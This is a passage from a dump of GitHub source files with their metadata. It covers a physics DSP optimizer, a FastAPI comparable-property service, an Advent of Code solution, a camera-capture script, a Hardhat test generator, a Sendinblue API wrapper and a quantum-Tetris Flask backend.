dsp_config = json.load(f, object_pairs_hook=OrderedDict)\n # pprint(dsp_config)\n # exit()\n \n # set dcr parameters\n # rise, flat, dcr_tstart = 200, 1000, 'tp_0+1.5*us' # default\n # dcr_rise, dcr_flat, dcr_tstart = 100, 3000, 'tp_0+3*us' # best so far?\n dcr_rise, dcr_flat, dcr_tstart = 100, 2500, 'tp_0+1*us'\n dsp_config['processors']['dcr_raw']['args'][1] = dcr_rise\n dsp_config['processors']['dcr_raw']['args'][2] = dcr_flat\n dsp_config['processors']['dcr_raw']['args'][3] = dcr_tstart\n \n # set trap energy parameters\n # ene_rise, ene_flat = \"2*us\", \"1*us\" # best? from optimize_trap\n ene_rise, ene_flat = \"10*us\", \"5*us\"\n dsp_config['processors']['wf_trap']['args'][1] = ene_rise\n dsp_config['processors']['wf_trap']['args'][2] = ene_flat\n \n # adjust pole-zero constant\n dsp_config['processors']['wf_pz']['defaults']['db.pz.tau'] = '64.4*us'\n # dsp_config['processors']['wf_pz']['defaults']['db.pz.tau'] = '50*us'\n # dsp_config['processors']['wf_pz']['defaults']['db.pz.tau'] = '100*us'\n \n # run dsp\n print('Running DSP ...')\n t_start = time.time()\n pc, tb_out = build_processing_chain(tb_data, dsp_config, verbosity=1)\n pc.execute()\n t_elap = (time.time() - t_start)/60\n print(f'Done. Elapsed: {t_elap:.2f} min')\n \n df_out = tb_out.get_dataframe()\n \n if write_output:\n df_out.to_hdf(f_results, key='opt_dcr')\n print('Wrote output file:', f_results)\n \n \ndef show_dcr_results(dg):\n \"\"\"\n plot of dcr vs energy for a single setting\n \"\"\"\n cycle = dg.fileDB['cycle'].values[0]\n df_dsp = pd.read_hdf(f'./temp_{cycle}.h5', 'opt_dcr')\n # print(df_dsp.describe()) \n\n # compare DCR and A/E distributions\n fig, (p0, p1) = plt.subplots(2, 1, figsize=(8, 8))\n \n elo, ehi, epb = 0, 25000, 100\n \n # aoe distribution\n # ylo, yhi, ypb = -1, 2, 0.1\n # ylo, yhi, ypb = -0.1, 0.3, 0.005\n ylo, yhi, ypb = 0.05, 0.08, 0.0005\n nbx = int((ehi-elo)/epb)\n nby = int((yhi-ylo)/ypb)\n h = p0.hist2d(df_dsp['trapEmax'], df_dsp['aoe'], bins=[nbx,nby],\n range=[[elo, ehi], [ylo, yhi]], cmap='jet',\n norm=LogNorm())\n # p0.set_xlabel('Energy (uncal)', ha='right', x=1)\n p0.set_ylabel('A/E', ha='right', y=1)\n\n # dcr distribution\n # ylo, yhi, ypb = -20, 20, 1 # dcr_raw\n # ylo, yhi, ypb = -5, 2.5, 0.1 # dcr = dcr_raw / trapEmax\n # ylo, yhi, ypb = -3, 2, 0.1\n ylo, yhi, ypb = 0.9, 1.08, 0.001\n ylo, yhi, ypb = 1.034, 1.0425, 0.00005 # best for 64.4 us pz\n # ylo, yhi, ypb = 1.05, 1.056, 0.00005 # best for 50 us pz\n # ylo, yhi, ypb = 1.016, 1.022, 0.00005 # best for 100 us pz\n nbx = int((ehi-elo)/epb)\n nby = int((yhi-ylo)/ypb)\n h = p1.hist2d(df_dsp['trapEmax'], df_dsp['dcr'], bins=[nbx,nby],\n range=[[elo, ehi], [ylo, yhi]], cmap='jet',\n norm=LogNorm())\n p1.set_xlabel('Energy (uncal)', ha='right', x=1)\n p1.set_ylabel('DCR', ha='right', y=1)\n \n # plt.show()\n plt.savefig(f'./plots/dcr_cyc{cycle}.png', dpi=300)\n plt.cla()\n \n \ndef check_wfs(dg):\n \"\"\"\n somebody inevitably asks you, 'have you looked at the waveforms?'\n in this function, compare alpha wfs to gamma wfs\n \n use the temp_results file to pick indexes, and grab the corresponding\n wfs. LH5 doesn't let us only load particular indexes (yet), so we\n have to load all the waveforms in the file every time. butts.\n \"\"\"\n # load dsp results\n cycle = dg.fileDB['cycle'].values[0]\n df_dsp = pd.read_hdf(f'./temp_{cycle}.h5', 'opt_dcr')\n \n # load waveforms\n sto = lh5.Store()\n lh5_dir = os.path.expandvars(dg.config['lh5_dir'])\n raw_list = lh5_dir + dg.fileDB['raw_path'] + '/' + dg.fileDB['raw_file']\n f_raw = raw_list.values[0] \n tb_wfs = sto.read_object('ORSIS3302DecoderForEnergy/raw/waveform', f_raw)\n \n # energy cut\n et = 'trapEmax'\n # elo, ehi = 8000, 16000\n # elo, ehi = 8000, 10000\n elo, ehi = 12000, 13000\n \n # dcr cut\n # alp_lo, alp_hi = -0.5, 0.5\n # gam_lo, gam_hi = 0.8, 1.2\n \n # aoe cut\n alp_lo, alp_hi = 0.064, 0.068\n gam_lo, gam_hi = 0.05, 0.06\n \n # selection\n idx_alp = df_dsp[et].loc[(df_dsp[et] > elo) & (df_dsp[et] < ehi) & \n (df_dsp.aoe > alp_lo) & (df_dsp.aoe < alp_hi)].index\n \n idx_gam = df_dsp[et].loc[(df_dsp[et] > elo) & (df_dsp[et] < ehi) & \n (df_dsp.aoe > gam_lo) & (df_dsp.aoe < gam_hi)].index\n \n wfs_alp = tb_wfs['values'].nda[idx_alp]\n wfs_gam = tb_wfs['values'].nda[idx_gam]\n \n print(f'found {wfs_alp.shape[0]} alpha candidates')\n print(f'found {wfs_gam.shape[0]} gamma candidates')\n \n # plot \n # fig, (p0, p1) = plt.subplots(2, 1, figsize=(8, 8))\n \n ts = np.arange(0, wfs_gam.shape[1], 1)\n\n n_gam = 10 if wfs_gam.shape[0] > 10 else wfs_gam.shape[0]\n for iwf in range(n_gam):\n max = np.amax(wfs_gam[iwf,:])\n # max = df_dsp[et].values[iwf]\n plt.plot(ts[:-1], wfs_gam[iwf,:-1]/max, '-b', lw=1, alpha=0.5)\n \n n_alp = 10 if wfs_alp.shape[0] > 10 else wfs_alp.shape[0]\n for iwf in range(n_alp):\n max = np.amax(wfs_alp[iwf,:])\n # max = df_dsp[et].values[iwf]\n plt.plot(ts[:-1], wfs_alp[iwf,:-1]/max, '-r', lw=1, alpha=0.5)\n\n # plt.xlim(1\n\n plt.xlabel('time (clock ticks)', ha='right', x=1)\n plt.ylabel('ADC', ha='right', y=1)\n plt.show()\n\n\nif __name__==\"__main__\":\n main()","repo_name":"CJNave613/CAGE","sub_path":"analysis/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":17842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"13333370437","text":"# fastapi-example/app.py\n# -*- coding: utf-8 -*-\n\n\nfrom typing import Optional\nfrom fastapi import FastAPI\nfrom sklearn.metrics.pairwise import haversine_distances\nfrom sklearn.neighbors import KNeighborsTransformer\nfrom math import radians\nfrom scipy.sparse import coo_matrix, hstack\nfrom scipy.sparse import save_npz, load_npz\nimport pandas as pd\nimport numpy as np\nfrom pickle import dump,load\n\ndataset = pd.read_csv('comparable_estates.txt', sep='|')\n#dataset = dataset[['latitude', 'longitude', 'area', 'bathrooms', 'garages', 'rooms', 'type']]\n#dataset['latitude'] = dataset['latitude'].apply(radians)\n#dataset['longitude'] = dataset['longitude'].apply(radians)\n#radianes = np.array(dataset[['latitude', 'longitude']])\n#transformer = KNeighborsTransformer(n_neighbors=20, mode='connectivity', metric='haversine')\n#transf_vecinos2 = transformer.fit(radianes)\n#matriz_vecinos_cercanos = transf_vecinos2.transform(radianes)\n#dump(transf_vecinos2, open('transf_vecinos.pkl', 'wb'))\n\ntransf_vecinos = load(open('transf_vecinos.pkl', 'rb'))\nst_fit = load(open('st_fit.pkl', 'rb'))\nmodelo_ajust_ = load(open('modelo_ajust.pkl', 'rb'))\nmodel_ = load(open('neighs.pkl', 'rb'))\n\napp = FastAPI()\n\n\n@app.get(\"/400\")\ndef vecinos_cercanos(latitud: float, longitud: float,\n area: float, bathrooms: float,\n garages:float, rooms:float, tipo:float):\n latitude = radians(latitud)\n longitude = radians(longitud)\n unic_dist = np.array([[latitude, longitude]])\n vecinos_distancia = modelo_ajust_.transform(unic_dist) * 2\n features = pd.DataFrame([{'area': area, 'bathrooms': bathrooms,\n 'garages': garages, 'rooms': rooms,\n 'type': tipo}])\n\n matriz_variables = hstack([vecinos_distancia, coo_matrix(features)]).tocsr()\n matriz_variables = st_fit.transform(matriz_variables)\n vecinos = model_.kneighbors(matriz_variables)\n vecinos = pd.DataFrame(np.concatenate(vecinos).T)\n M = vecinos[1]\n resultado = dataset.loc[M, ['latitude', 'longitude', 'area', 'bathrooms', 'garages', 'rooms', 'type']]\n js = resultado.to_json(orient='columns')\n return js\n\n","repo_name":"marco-ramirezpp/modelo_comparables","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27337763328","text":"# Written by Cameron Haddock\n# Written as a solution for Advent of Code 2021\n\n# https://adventofcode.com/2021/day/21\n\nfrom functools import lru_cache\nfrom collections import Counter\nfrom itertools import product\n\nclass Player:\n def __init__(self,position:int,score:int=0):\n self.position = position\n self.score = score\n\n def step(self,rolls:int):\n self.position += rolls\n self.position %= 10\n if self.position == 0:\n self.position = 10\n self.score += self.position\n return self\n\n def copy(self) -> 'Player':\n return Player(self.position,self.score)\n\n def __repr__(self) -> str:\n return f'Player({self.position},{self.score})'\n\n def __eq__(self,other:'Player') -> bool:\n return self.position == other.position and self.score == other.score\n\n def __hash__(self):\n return hash((self.position,self.score))\n\nTARGET_SCORE = 21\nDIRAC_ROLLS = Counter(d1+d2+d3 for d1,d2,d3 in product([1,2,3],repeat=3))\n\n@lru_cache(maxsize=None)\ndef play_dice(p1:Player,p2:Player,turn:bool) -> tuple[int,int]:\n if p1.score >= TARGET_SCORE:\n return 1,0\n if p2.score >= TARGET_SCORE:\n return 0,1\n\n p1_wins,p2_wins = 0,0\n for roll,freq in DIRAC_ROLLS.items():\n if turn:\n scores = play_dice(p1.copy().step(roll),p2,False)\n else:\n scores = play_dice(p1,p2.copy().step(roll),True)\n p1_wins += scores[0] * freq\n p2_wins += scores[1] * freq\n\n return p1_wins,p2_wins\n\n\nwith open('2021/21/input.txt') as f:\n p1_line,p2_line = f.read().splitlines()\np1 = Player(int(p1_line.split()[-1]))\np2 = Player(int(p2_line.split()[-1]))\n\nprint(play_dice(p1,p2,True))","repo_name":"TheBiggerFish/AdventOfCode","sub_path":"2021/21/dec21_part2.py","file_name":"dec21_part2.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73776603941","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 11 12:43:16 2017\n\n@author: i13yamamoto2y\n\"\"\"\n\nimport cv2\n\ncap2 = cv2.VideoCapture(1);\ni = 0;\nwhile(True):\n ret, frame2 = cap2.read();\n \n cv2.imshow(\"image2\", frame2);\n \n key = cv2.waitKey(1)\n if key == ord(\"a\"):\n break;\n if key == ord(\"s\"):\n cv2.imwrite(\"C:/Users/i13yamamoto2y/Documents/tmp/camera2/{0}.jpg\".format(i), frame2);\n i += 1;\n\ncap2.release();\ncv2.destroyAllWindows();\n","repo_name":"YamamotoYuya/calibrate","sub_path":"capture1.py","file_name":"capture1.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74705062820","text":"import json\nimport os\nimport re\nimport shutil\nimport subprocess\nimport OpenFile\n\npath = \"/home/yantong/Code/ScapyEtherscan/convertFileToPart\"\nhardhat_workingspace = \"/home/yantong/Code/hardhatTest\"\norigin_path = os.getcwd()\n\n\ndef deleteDirFiles(dir_path):\n for filename in os.listdir(dir_path):\n file_path = os.path.join(dir_path, filename)\n if os.path.isfile(file_path):\n os.remove(file_path)\n\n\ndef copyFile(dirname):\n deleteDirFiles(hardhat_workingspace + \"/contracts\")\n filename = os.listdir(path + \"/sol_contents/\" + dirname)[0]\n os.system(\"cp \" + path + \"/sol_contents/\" + dirname + \"/\" + filename + \" /home/yantong/Code/hardhatTest/contracts/\" + filename)\n return filename\n\n\ndef collectMessage(jsonStr):\n jsonStr = json.loads(jsonStr)\n result = []\n\n for j in range(0, len(jsonStr['types'])):\n types = jsonStr['types'][j]\n _input = jsonStr['inputs'][j]\n if types == 'address':\n if _input.find(\"0x\") == -1:\n result.append(\"\\\"0x\" + _input + \"\\\"\")\n else:\n result.append(\"\\\"\" + _input + \"\\\"\")\n elif types.find(\"uint\") != -1:\n if types.find(\"[\") == -1:\n if isinstance(_input,dict):\n result.append(\"\\\"\" + _input['hex'] + \"\\\"\")\n else:\n result.append(\"\\\"\" + str(_input) + \"\\\"\")\n else:\n tmp = []\n for it in _input:\n if isinstance(it,dict):\n tmp.append(\"\\\"\" + it['hex'] + \"\\\"\")\n else:\n tmp.append(\"\\\"\" + str(_input) + \"\\\"\")\n result.append(\"[\" + \",\".join(tmp) + \"]\")\n elif types.find(\"[\") != -1:\n tmp = []\n for it in _input:\n if isinstance(it,bool):\n tmp.append(str(int(it)))\n else:\n if isinstance(it,list):\n if len(it) == 0:\n tmp.append(\"[]\")\n else:\n tmp.append(str(it))\n else:\n tmp.append(\"\\\"\" + it + \"\\\"\")\n result.append(\"[\" + \",\".join(tmp) + \"]\")\n elif types == \"bool\":\n result.append(str(int(_input)))\n else:\n if isinstance(_input,dict):\n result.append(\"\\\"\" + _input['hex'] + \"\\\"\")\n elif isinstance(_input,list):\n _input = [f'\"{item}\"' for item in _input]\n result.append(\"[\" + \",\".join(_input) + \"]\")\n else:\n result.append(\"\\\"\" + _input + \"\\\"\")\n return \",\".join(result)\n\n\ndef collectConstructorArgument(jsonStr):\n jsonStr = json.loads(jsonStr)\n result = []\n if '__length__' not in jsonStr:\n print(json.dumps(jsonStr))\n return \"\"\n length = jsonStr['__length__']\n for j in range(0, int(length)):\n if isinstance(jsonStr[str(j)], list):\n jsonStr[str(j)] = [f'\"{item}\"' for item in jsonStr[str(j)]]\n result.append(\"[\" + \",\".join(jsonStr[str(j)]) + \"]\")\n elif isinstance(jsonStr[str(j)],bool):\n result.append(str(int(jsonStr[str(j)])))\n else:\n if jsonStr[str(j)] is None:\n result.append(\"\\\"\\\"\")\n else:\n result.append(\"\\\"\" + jsonStr[str(j)] + \"\\\"\")\n result = \",\".join(result)\n return result\n\n\ndef generateScript():\n result = \"const {{expect}} = require(\\\"\"\"chai\\\"\"\");\\n\" \\\n \"const {{loadFixture}} = require(\\\"\"\"@nomicfoundation/hardhat-network-helpers\\\"\"\");\\n\" \\\n \"const web3 = require(\\\"\"\"web3\\\"\"\");\\n\\n\" \\\n \"describe(\\\"\"\"{contract_name}\\\"\"\",function(){{\\n\"\n result += \"\\tasync function deployOneYearLockFixture(){{\\n\" \\\n \"\\t\\tconst _Contract = await ethers.getContractFactory(\\\"\"\"{contract_name}\\\"\"\");\\n\" \\\n \"\\t\\tconst [account0,account1,account2] = await ethers.getSigners();\\n\" \\\n \"\\t\\tconst _contract = await _Contract.deploy({constructor_argument});\\n\" \\\n \"\\t\\treturn {{_contract,account0,account1,account2}};\" \\\n \"\\n\\t}}\\n\\n\"\n result += \"\\tdescribe(\\\"{function_name}\\\",function(){{\\n\" \\\n \"\\t\\tit(\\\"\"\"testing {function_name}\\\"\"\",async function(){{\\n\" \\\n \"\\t\\t\\tconst {{_contract,account0,account1,account2}} = await loadFixture(deployOneYearLockFixture);\\n\" \\\n \"\\t\\t\\tawait _contract.connect({account}).{function_name}({contract_input});\\n\" \\\n \"\\t\\t}});\\n\" \\\n \"\\t}});\\n\" \\\n \"}});\"\n\n return result\n\n\ndef modifyHardhatConfig(compile_version):\n config_str = OpenFile.openFileByString(hardhat_workingspace + \"/hardhat.config.js\")\n pattern = r'(?<=\\{version:\")[0-9.]+(?=\"})'\n # 用新的版本号替换旧的版本号\n config_str = re.sub(pattern, compile_version, config_str)\n return config_str\n\n\ndef testCollectMessage(dirname):\n # constructor_argument = OpenFile.openFileByString(path + \"/other_contents/\" + dirname + \"/constructor_arguments.json\")\n # print(constructor_argument)\n # constructor_inputs = collectConstructorArgument(constructor_argument)\n # print(constructor_inputs)\n\n # file_input_list = os.listdir(path + \"/input_content/\" + dirname)\n # for input_info in file_input_list:\n # input_info = OpenFile.openFileByString(path + \"/input_content/\" + dirname + \"/\" + input_info)\n # print(input_info)\n # input_info = collectMessage(input_info)\n # print(input_info)\n compile_version = OpenFile.openFileByString(path + \"/other_contents/\" + dirname + \"/compile_version.txt\")\n print(compile_version)\n\n pattern = re.compile(r'v(\\d+\\.\\d+\\.\\d+)')\n compile_version = [m.group(1) for m in pattern.finditer(compile_version)]\n if len(compile_version) != 0:\n print(compile_version[0])\n # print(compile_version)\n # compile_version = compile_version.split(\"+\")[0][1:]\n\n\ndef init(dirname):\n deleteDirFiles(hardhat_workingspace + \"/test\")\n # 读取构造函数信息以及编译器版本信息\n compile_version = OpenFile.openFileByString(path + \"/other_contents/\" + dirname + \"/compile_version.txt\")\n constructor_argument = OpenFile.openFileByString(path + \"/other_contents/\" + dirname + \"/constructor_arguments.json\")\n pattern = re.compile(r'v(\\d+\\.\\d+\\.\\d+)')\n compile_version = [m.group(1) for m in pattern.finditer(compile_version)]\n if len(compile_version) == 0:\n return 0\n compile_version = compile_version[0]\n constructor_inputs = collectConstructorArgument(constructor_argument)\n # 修改hardhat.config\n config_file = modifyHardhatConfig(compile_version)\n OpenFile.writeFile(hardhat_workingspace + \"/hardhat.config.js\",config_file)\n # 读取输入\n filename = os.listdir(path + \"/sol_contents/\" + dirname)[0]\n file_input_list = os.listdir(path + \"/input_content/\" + dirname)\n for input_info in file_input_list:\n id = file_input_list.index(input_info)\n input_info = OpenFile.openFileByString(path + \"/input_content/\" + dirname + \"/\" + input_info)\n if input_info == '{\"method\": null, \"types\": [], \"inputs\": [], \"names\": []}':\n continue\n function_name = json.loads(input_info)['method']\n if function_name is None:\n continue\n input_info = collectMessage(input_info)\n # 根据构造函数输入以及读取的输入生成测试脚本\n\n scriptStr = generateScript().format(contract_name=filename[:-4],\n constructor_argument=constructor_inputs,\n function_name=function_name,\n contract_input=input_info,\n account = \"account0\")\n # account=\"account\" + str(random.randint(0,10)))\n OpenFile.writeFile(\"/home/yantong/Code/hardhatTest/test/\" + filename[:-4] + \"_\" + function_name + \"_\" + str(id) + \".js\", scriptStr)\n # print(scriptStr)\n # print(\"s\")\n\n# collectMessage(OpenFile.openFileByString(path+\"/input_content/0x0a16305612706b4eabce43247d61fe7fbed708e4/1.json\"))\n# tmpStr = OpenFile.openFileByString(path + \"/other_contents/0x0a6d448547c6da0ed11e10a2358ee0b4f20a8a28/constructor_arguments.json\")\ndef copyAtoB(src_folder,dst_folder):\n # 遍历A文件夹中的所有文件和子文件夹\n for root, dirs, files in os.walk(src_folder):\n # 遍历当前目录下的文件\n for _file in files:\n # 源文件路径\n src_file_path = os.path.join(root, _file)\n # 目标文件路径\n dst_file_path = os.path.join(dst_folder, _file)\n # 拷贝文件到目标文件夹\n shutil.copy(src_file_path, dst_file_path)\n\n\ndef execCommand(sha):\n os.chdir(hardhat_workingspace)\n # 执行命令\n ret = subprocess.run(\"npx hardhat coverage --temp build\",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,encoding=\"utf-8\")\n matches = re.findall(r\"✔\\s+testing\\s+(\\S+)\\s+\\((\\d+)ms\\)\", ret.stdout)\n for match in matches:\n if not os.path.exists(origin_path + \"/test suite/\" + sha):\n os.mkdir(origin_path + \"/test suite/\" + sha)\n copyAtoB(hardhat_workingspace + \"/contracts\", origin_path + \"/test suite/\" + sha)\n file_list = os.listdir(hardhat_workingspace + \"/test\")\n for _item in file_list:\n if _item.find(match[0]) != -1:\n shutil.copy(hardhat_workingspace + \"/test/\" + _item, origin_path + \"/test suite/\" + sha + \"/\" + _item)\n # print(ret.stdout)\n\n\nif __name__ == \"__main__\":\n\n with open(\"waitingList.txt\", \"r\") as file:\n dirlist = file.read().split(\"\\n\")[:-1]\n\n for i in range(1114,len(dirlist)):\n item = dirlist[i]\n print(str(i))\n # testCollectMessage(dirlist[i])\n copyFile(item)\n init(item)\n execCommand(item)","repo_name":"Ether1oop/generateTestScript","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23444077065","text":"# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\nimport logging\nfrom odoo import tools, _\n\nimport sib_api_v3_sdk\nfrom sib_api_v3_sdk.rest import ApiException\n_logger = logging.getLogger(__name__)\n\n\nclass SendinblueWebService():\n\n def __init__(self, company, env):\n self.company = company\n self.custom_env = env\n self.api_key = tools.config.get('sendinblue_api_key')\n configuration = sib_api_v3_sdk.Configuration()\n configuration.api_key['api-key'] = self.api_key\n # Uncomment below to setup prefix (e.g. Bearer) for API key, if needed\n # configuration.api_key_prefix['api-key'] = 'Bearer'\n # create an instance of the API class\n self.api_instance_account_api = sib_api_v3_sdk.AccountApi(\n sib_api_v3_sdk.ApiClient(configuration)\n )\n self.api_instance_contacts_api = sib_api_v3_sdk.ContactsApi(\n sib_api_v3_sdk.ApiClient(configuration)\n )\n\n # get_attributes\n def get_attributes(self):\n response = {\n 'errors': True,\n 'error': \"\",\n 'response': \"\"\n }\n try:\n api_response = self.api_instance_contacts_api.get_attributes()\n response['response'] = api_response\n response['errors'] = False\n except ApiException as e:\n response['error'] = \\\n _(\"Exception when calling AccountApi->get_account: %s\") % e\n return response\n\n # get_folders\n def get_folders(self):\n response = {\n 'errors': True,\n 'error': \"\",\n 'response': \"\"\n }\n try:\n api_response = self.api_instance_contacts_api.get_folders(10, 0)\n response['response'] = api_response\n response['errors'] = False\n except ApiException as e:\n response['error'] = \\\n _(\"Exception when calling AccountApi->get_account: %s\") % e\n return response\n\n # get_lists\n def get_lists(self):\n response = {\n 'errors': True,\n 'error': \"\",\n 'response': \"\"\n }\n try:\n api_response = self.api_instance_contacts_api.get_lists()\n response['response'] = api_response\n response['errors'] = False\n except ApiException as e:\n response['error'] = \\\n _(\"Exception when calling AccountApi->get_account: %s\") % e\n return response\n\n # get_contacts\n def get_contacts(self, limit=1000):\n response = {\n 'errors': True,\n 'error': \"\",\n 'response': \"\"\n }\n try:\n api_response = self.api_instance_contacts_api.get_contacts(\n limit=10,\n offset=0\n )\n if api_response:\n pages_calculate = float(api_response.count)/float(limit)\n pages_calculate = \"{0:.2f}\".format(pages_calculate)\n pages_calculate_split = pages_calculate.split('.')\n if pages_calculate_split[1] != \"00\":\n pages_calculate = int(pages_calculate_split[0])+1\n\n response['response'] = {\n 'count': api_response.count,\n 'contacts': []\n }\n for i in range(1, pages_calculate+1):\n offset = 0\n if i > 1:\n offset = limit*i\n offset = offset-limit\n response_page = self.get_contacts_real(limit, offset)\n if response_page:\n response['response']['contacts'].extend(response_page.contacts)\n\n response['errors'] = False\n except ApiException as e:\n response['error'] = \\\n _(\"Exception when calling AccountApi->get_account: %s\") % e\n return response\n\n def get_contacts_real(self, limit, offset):\n try:\n return self.api_instance_contacts_api.get_contacts(\n limit=limit,\n offset=offset\n )\n except ApiException as e:\n return False\n","repo_name":"OdooNodrizaTech/oniad","sub_path":"oniad_sendinblue/sendinblue/web_service.py","file_name":"web_service.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1386566565","text":"import os\nfrom flask import Flask, request\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom application import models\n# create and configure the application and database\napp = Flask(__name__, instance_relative_config=True)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\napp.config.from_object(os.environ['APP_SETTINGS'])\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\ndb.init_app(app)\n\nfrom . import quantum as q\nfrom . import player as p\n\n#************** PLAYER ENDPOINTS *****************\nplayer=p.Player()\n\n# Purpose: Creates a player in database with given highscore\n# Data contract\n# userId: str\n# hiscore: int\n# Sample JSON Body\n# {\n# \t\"userId\": \"player\",\n# \t\"hiscore\": 90\n# }\n#\n#\n# Sample response\n# {\n# \"hiscore\": 90,\n# \"id\": 4,\n# \"userId\": \"player\"\n# }\n@app.route('/api/createPlayer', methods=['POST'])\ndef createPlayer():\n if request.method == 'POST':\n params=request.get_json()\n newPlayer = models.PlayerModel(params['userId'], params['hiscore'])\n response = player.createPlayer(newPlayer)\n return response\n return None\n# Purpose: Fetches a player in database with given userId\n# Data contract\n# userId: str\n# Sample request\n# [SERVER_NAME]/api/fetchPlayer?userId=player\n#\n# Sample response\n# {\n# \"hiscore\": 90,\n# \"id\": 4,\n# \"userId\": \"player\"\n# }\n@app.route('/api/fetchPlayer', methods=['GET'])\ndef fetchPlayer():\n if request.method == 'GET':\n userId = request.args.get('userId', default= None, type= str)\n response = player.fetchPlayer(userId)\n return response\n return None\n\n# Purpose: Updates a player's hiscore in database from given userId and hiscore\n# Data contract\n# userId: str\n# hiscore: int\n#\n# Sample JSON body\n# {\n# \t\"userId\": \"player\",\n# \t\"hiscore\": 15\n# }\n# Sample response\n# {\n# \"hiscore\": 15,\n# \"id\": 4,\n# \"userId\": \"player\"\n# }\n@app.route('/api/updateHiscore', methods=['PUT'])\ndef updateHiscore():\n if request.method == 'PUT':\n params=request.get_json()\n updatePlayer = models.PlayerModel(params['userId'], params['hiscore'])\n response = player.updateHiscore(updatePlayer)\n return response\n return None\n\n# Purpose: Deletes a player in database with given userId\n# Data contract\n# userId: str\n# Sample request\n# [SERVER_NAME]/api/deletePlayer?userId=player\n#\n#\n# Sample response\n# {\n# \"hiscore\": 15,\n# \"id\": 4,\n# \"userId\": \"player\"\n# }\n@app.route('/api/deletePlayer', methods=['DELETE'])\ndef delete():\n if request.method == 'DELETE':\n userId = request.args.get('userId', default= None, type= str)\n response = player.delete(userId)\n return response\n return None\n\n#************** QUANTUM ENDPOINTS *****************\nquantum=q.Quantum()\n\n# Purpose: Generates random integer between 0 and provided max int\n# Data contract\n# max: int\n# Sample request\n# [SERVER_NAME]/api/generateRandomNumber?max=10\n#\n#\n# Sample response\n# {\n# \"randomInt\": 2\n# }\n@app.route('/api/generateRandomNumber', methods=['GET'])\ndef generateRandomNumber():\n if request.method == 'GET':\n maxNum = request.args.get('max', default= None, type= int)\n response = quantum.generateRandomNumber(maxNum)\n return response\n return None\n\n# Purpose: Create a superposition of two piece with random types and probabilities\n# Data contract\n# NO DATA NEEDED\n#\n# Sample Request\n# [SERVER_NAME]/api/createSuperposition\n#\n# {\n# \"result\": {\n# \"piece1\": {\n# \"prob\": 0.25,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.75,\n# \"type\": 4\n# }\n# }\n# }\n#\n@app.route('/api/createSuperposition', methods=['GET'])\ndef createSuperposition():\n if request.method == 'GET':\n response = quantum.createSuperposition()\n return response\n return None\n\n# Purpose: Calculates a superposition result (0 or 1) based on given probability of 0\n# Data contract\n# prob: float (0-1)\n#\n# Sample Request\n# [SERVER_NAME]/api/determineSuperposition?prob=.60\n#\n# Sample result\n# {\n# \"result\": 0\n# }\n#\n@app.route('/api/determineSuperposition', methods=['GET'])\ndef determineSuperposition():\n if request.method == 'GET':\n prob = request.args.get('prob', default= None, type= float)\n response = quantum.determineSuperposition(prob)\n return response\n return None\n\n# Purpose: Applies an H gate to any given superposition piece and return a new probabilities\n# Data contract\n# prob: float (0-1)\n#\n# Sample Request\n# [SERVER_NAME]/api/applyHGate\n\n# Sample JSON Object\n# {\n# \"piece1\": {\n# \"prob\": 0.2,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.8,\n# \"type\": 4\n# }\n# }\n#\n# Sample result\n# {\n# \"result\": {\n# \"piece1\": {\n# \"prob\": 0.18,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.82,\n# \"type\": 4\n# }\n# }\n# }\n#\n@app.route('/api/applyHGate', methods=['POST'])\ndef applyHGate():\n if request.method == 'POST':\n params = request.get_json()\n response = quantum.applyHGate(params)\n return response\n return None\n\n# Purpose: Applies an X gate to any given superposition piece and return a new probabilities\n# Data contract\n# prob: float (0-1)\n#\n# Sample Request\n# [SERVER_NAME]/api/applyHGate\n\n# Sample JSON Object\n# {\n# \"piece1\": {\n# \"prob\": 0.2,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.8,\n# \"type\": 4\n# }\n# }\n#\n# Sample result\n# {\n# \"result\": {\n# \"piece1\": {\n# \"prob\": 0.8,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.2,\n# \"type\": 4\n# }\n# }\n# }\n#\n@app.route('/api/applyXGate', methods=['POST'])\ndef applyXGate():\n if request.method == 'POST':\n params = request.get_json()\n response = quantum.applyXGate(params)\n return response\n return None\n\n# Purpose: Flips piece based on state\n# Data contract\n# piece: int\n# Sample request\n# [SERVER_NAME]/api/flipEntangledPiece?state=1\n#\n#\n# Sample response\n# {\n# \"result\": 0\n# }\n@app.route('/api/flipEntangledPiece', methods=['GET'])\ndef flipEntangledPiece():\n if request.method == 'GET':\n state = request.args.get('state', default= None, type= int)\n response = quantum.flipEntangledPiece(state)\n return response\n return None","repo_name":"dartmouth-cs98/Quantum-Tetris","sub_path":"server/application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6287,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"35"} +{"seq_id":"31702576159","text":"import sys\nimport threading\nimport tkinter\nfrom tkinter import messagebox\n\nfrom SSPANEL_GET import SSPANEL_GET\n\nurl = \"5.52vpn.club\"\ntok = \"b=3\"\nvcode = \"geetest\"\ngui = True if sys.platform == 